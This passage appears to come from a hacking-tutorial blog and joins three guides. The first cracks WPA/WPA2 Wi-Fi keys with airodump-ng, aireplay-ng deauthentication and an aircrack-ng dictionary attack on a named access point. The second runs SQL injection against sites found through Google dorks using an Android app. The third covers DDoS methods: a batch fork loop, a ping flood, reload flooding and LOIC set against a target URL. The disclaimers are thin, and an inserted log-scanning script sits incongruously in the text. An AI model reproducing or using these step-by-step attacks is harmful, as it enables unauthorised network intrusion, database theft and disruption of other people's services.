Step 2—Next, we would listen on the mon0 interface for other access points having encryption set to either WPA or WPA2. We would use the “airmon-ng mon0” command to do it.
Our target AP would be Shaxter, which uses WPA as its encryption type. We will take note of its BSSID and the channel that it’s on; this information will be useful in the upcoming steps.
BSSID: F4:3E:61:92:68:D7
Channel:


Capturing Packets
Step 3—Next, we need to save the data associated with our access point to a specific file. The inputs we need to specify are the channel, the bssid, and the file name to write.
Command: airodump-ng -c 1 -w rwap --bssid F4:3E:61:92:68:D7 mon0
◾ -w: File to write
◾ -c: Channel

Capturing the Four-Way Handshake
Step 4—In order to successfully crack WPA, we would need to capture the four-way handshake. As mentioned, to achieve this we could use a deauthentication attack to force clients to disconnect and reconnect with the access point.
Structure: aireplay-ng --deauth 10 -a <Target AP> -c <Mac address of Mon0> mon0
Command: aireplay-ng --deauth 10 -a F4:3E:61:92:68:D7 -c 94:39:E5:EA:85:31 mon0
After we have successfully performed a deauthentication attack, we will be able to capture the four-way handshake.

Cracking WPA/WPA2
Now that we have all the inputs required for cracking the WPA/WPA2 PSK, we will use aircrack-ng and specify a wordlist that would be used against the rhawap.cap file that was generated earlier. Remember that in order for us to successfully crack the WPA/WPA2 PSK, we need to make sure that our file contains the four-way handshake.
Structure: aircrack-ng -w Wordlist 'capture_file'.cap
Command: aircrack-ng rhawap.cap -w /pentest/passwords/wordlists/darkc0de.lst
So, now this will start the dictionary attack against the rhawap.cap file, and if the key is found in the dictionary, it will reveal it to us.


How to do SQL injection on Android using DriodSQLi


Hello folks! SQL injection on Android has always been fun for hackers, especially beginners! But wait a moment, have you ever thought of doing this attack from your phone? This isn’t a dream or a nightmare. Today I’m going to show you the steps for how you can do this at your fingertips! Cheers, let’s move on!

Before going further, if you are confused about SQL and what a SQL injection attack really means, I advise you to read this tutorial first:


Also read these articles to get a quick idea of how you can achieve this straight from your box. Given below is a detailed guide on SQL injection attacks, and note that these tutorials have gained critical appreciation as well. I highly recommend that you go through it too!

How to do SQL injection without any tool TUTORIAL PART 1

How to do SQL injection without any tool TUTORIAL PART 2

MUST READ IF YOU’RE NEW TO THIS BLOG: How to do SQL injection without any tool TUTORIAL PART 3

How to do SQL injection without any tool TUTORIAL PART 4

Let’s start now! You need to have a rooted Android. To know more, read:

How to root any Android in 2 minutes

First you have to download the apk file from here :

(Copy the above link and download)

Now you should have a little knowledge of Google dorks. Here is the list of Google dorks vulnerable to SQL injection:










Here is the link to download a whole list :

Let’s take an example to describe the process step by step:

For e.g.:

1. Let’s take a Google dork link


2. Copy and paste this link into Google.

3. Then tap on any link that you wish to inject with SQL, for e.g.:

4. Copy the entire URL

5. Now, open the DriodSQLi apk

Then, in the Target URL field:

Paste the link copied from Google, i.e. (

7. Then tap on Inject

Done. Wait till the process ends.

Wow, we have successfully hacked the database with SQL.

Hope you enjoyed reading this tutorial on SQL injection through Android!

Do like, comment & share with your friends! 🙂

Happy Hacking!!

How to DDoS any website in a minute? Step-By-Step Guide



Recent events that have gone on in my favorite website have inspired me to inform people of the dangers of DDoS.

There is no anti-virus for DDoS. The only cure is knowledge. Informing the people is the only way to keep it from happening to them.

If you want to know more on DDoS, I suggest you read this tutorial before moving on:

I know there are a lot more ways to DoS than are shown here, but I’ll let you figure them out yourself. If you find any mistake in this tutorial please tell me… 😉

What is “DDoS”?


Denial of Service attacks (or Distributed Denial of Service attacks [DDoS]) are a form of organized attack with the goal of taking down a server by overloading it, often by sending useless information (packets) to the server in massive amounts.

Keep in mind that although spreading knowledge is my main goal, performing DDoS attacks is indeed a federal cyber crime.

It is also an international offence and will be punished according to the local laws of the individual’s country.

But enough talk. I will now show you a quick example of a DoS attack of sorts you can do on your local computer.


Keep in mind that this is NOT a real DoS attack, but rather an example to visualize how a DoS attack works.

You will take down YOUR computer.

Step 1
Open up notepad, mousepad, or your favored equivalent.

Step 2
Type in this simple batch command

goto a

Step 3

Save as “dos.bat” making sure you select “All files” from the “File Type” dialog.

Step 4
Run that sucker, but save your work first, as this will crash even the best computers in a matter of minutes.

What did you learn from this?

Observe how the file rapidly replicates itself, opening a new CMD right after it opens another.
An infinite loop has been created that has filled the RAM with useless and massive amounts of CMDs (or Terminals for Unix folks)

DDoS attacks work much the same way, except instead of replicating an infinite number of CMDs, they send information (packets) to the server over and over and over again until the server crashes.

What information you may ask?

Anything. Your login name, your ‘online’ status, a new comment, the number of views on a video, your new high score. Absolutely any information that could be resent a massive amount of times to the same server.

Next we will be discussing the simplest form of DDoS.

DDoS by Ping Flood

Please note that I will be pinging my Localhost. You should too.

Perhaps one of the simplest ways to DoS is by using the ‘ping’ command built into most operating systems, including all Windows versions and Linux distributions.

Step 1
Start up your server. Mine is apache, but that is beside the point, the server type does not matter. If it has an IP address, it can be pinged.

Step 2
Type in the ping command

ping -t -a -l 65500 localhost

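Please note, the command above is for Windows users. Linux users don’t need to specify the -t parameter, because ping runs until stopped by default there. On Linux the packet size is set with -s (there, -l means preload and -a means audible ping). So, for UNIX/Linux users, the command would be as follows:

ping -s 65500 localhost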

Step 3
Press enter and watch it ping the localhost over and over until your server crashes, or you get tired of waiting for it to crash.
Since most modern servers can take the stress of the ping flood, you will need to get all your friends to help you ping to bring your server down. Or even slow it down.

Command Explained

ping – tells the computer to ping a server
-t – It will continue to ping the server until the command is closed, or stopped.
-a – Resolves the address to host names.
-l – Size of the send buffer, in bytes.

By default the ping will send 32 bytes of data to the server, so you must change this to a bigger number. The maximum is 65,500 bytes, so that is what we used.

If you send a server any number higher than 65,500 bytes it will instantly crash. This is called “Ping of Death”.
Like any other thing with the suffix “of Death” it is very rare, and hard to accomplish indeed.
In order to learn more about the Ping of Death, read my huge response to this very thread, here!

DDoS by Reloading

Something as simple as reloading a page can take down a server if done enough times.

Step 1
Make a page that lets you submit forms. Method=’GET’ is better than method=’POST’ for this, but both will work.
(If you do not understand step 1, just find a page that lets you submit information, like a new comment or upload a picture)

Step 2
Fill out the forms and submit

Step 3
Reload the page
If the page uses the POST method your browser will display a dialog asking if you are sure you want to resend the information, or something to that effect. Simply click “Continue” or “OK”. (See now why GET is better?)

Step 4
Keep reloading until the server is down.
There are many add-ons and tools that allow you to auto-reload a page. It is a matter of googling for them. They are widely available and free.

This method is very primitive as you can see, but it is probably the best way to DDoS.

Low-Orbit Ion Cannon

LOIC (Low Orbit Ion Cannon) is an app, written in C# and developed by praetox, that was used by Anonymous during Project Chanology. It attempts to DoS the target site by using all its bandwidth, sending TCP, UDP, or HTTP requests to the server until it crashes.


Step 1
Download and extract LOIC

Step 2
Open LOIC.exe and fill out the required information.

Instructions for filling out

IP or URL = IP or URL that you wish to DoS
TCP / UDP message = information being sent, just write something random. Or leave it as default.
Port = Server’s port
Method = Server’s Method, leave as TCP if unknown
If you are gonna try to take down a website then use HTTP
Speed = set to “<= faster”
Threads = How many users it should simulate, the higher the number the faster it will crash. Set to 10,000. Note that this might make your computer lag, if so, set to a lower amount.

Step 3
This starts the program.


This tool might not seem like much, but many people of all ages have been arrested and convicted for knowingly using this tool. Remember DoS and DDoS are federal crimes, however insignificant it may seem. Use at your own discretion.
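On the defending side, the reload flood and LOIC's HTTP mode described above both appear in web server access logs as one client repeating the same request at a high rate. The following is an added example, not part of the original tutorial: a sliding-window detector run over constructed Common Log Format lines. The function names, thresholds, and sample IPs (documentation ranges) are assumptions made for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Common/Combined Log Format: ip - - [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return (ip, datetime, method, path), or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]

def find_request_floods(lines, max_hits=5, window_s=10):
    """Flag (ip, method, path) keys exceeding max_hits requests in a sliding
    window_s-second window; each client's lines must be in time order."""
    recent = defaultdict(deque)  # key -> timestamps still inside the window
    flagged = {}                 # key -> peak request count in one window
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip junk instead of aborting the scan
        ip, ts, method, path = rec
        key = (ip, method, path)
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()  # drop requests that fell out of the window
        if len(q) > max_hits:
            flagged[key] = max(flagged.get(key, 0), len(q))
    return flagged

def make_sample():
    """Constructed log lines (documentation IP ranges, not real traffic)."""
    flood = [f'203.0.113.7 - - [01/Jan/2024:12:00:{s // 2:02d} +0000] '
             '"GET /comment.php?msg=hi HTTP/1.1" 200 512' for s in range(8)]
    normal = [f'198.51.100.9 - - [01/Jan/2024:12:00:{s:02d} +0000] '
              f'"GET {p} HTTP/1.1" 200 1024'
              for s, p in [(1, "/"), (20, "/about"), (45, "/contact")]]
    return flood + normal + ["not a log line"]

if __name__ == "__main__":
    for key, peak in find_request_floods(make_sample()).items():
        print(key, "peak requests in window:", peak)
```

The same threshold is normally enforced live at the reverse proxy or WAF as a per-client rate limit; scanning logs afterwards is useful for tuning that limit and for incident review.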


Now you know what a DDoS attack is and you can work to better protect yourself.

There are still many other ways to attack a server, but these are the basics of DoS.
Protect your servers. xD

Like any web developer I hope you will use this information for the good.
Sadly I know that there are those among us that are, even now as we read this, plotting how to do harm with this information.

To those, I flip the bird.

You may use this tutorial, in part or as a whole, for whatever purpose.

I hope you enjoyed reading this tutorial.